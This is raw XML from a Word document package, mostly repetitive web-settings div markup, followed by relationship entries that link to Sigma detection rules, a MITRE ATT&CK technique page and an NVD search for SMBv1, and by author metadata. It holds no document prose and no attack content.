    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008121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331576">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="897939582">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2064057480">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1634359959">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1669942121">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="629359177">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="290601737">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1644114729">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="108364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027231">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1123811689">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1804033749">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="809596057">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1158611781">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1911109661">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1070269353">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="17426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384440">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1575121088">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="283000265">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1725328104">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1609580313">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1048069227">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1737623224">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1205557601">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="192194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37831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="769592253">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="54094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49502">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="68307138">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="72787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1803">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="575282057">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="832991139">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1901206897">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="276646346">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1678732727">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="751124309">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1154613448">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="126896547">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="10301171">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="147329990">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1137265600">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="445276658">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="893656316">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1833596889">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1595479030">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1470440806">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1470125130">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1288463927">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="18743298">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1344363051">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1185435246">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="953827851">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="1920284403">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="104590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detection.fyi/sigmahq/sigma/windows/powershell/powershell_script/posh_ps_get_process_security_software_discovery/" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1518/001" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/search/results?form_type=Basic&amp;results_type=overview&amp;query=SMBv1&amp;search_type=all&amp;isCpeNameSearch=false" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.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1.png" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.base64decode.org/" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"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William Thomas Leppert</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>wleppert@gmu.edu</lastModifiedBy>
  <revision>3</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-26T18:01:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-26T18:14:10.3163485Z</dcterms:modified>
</coreProperties>
</file>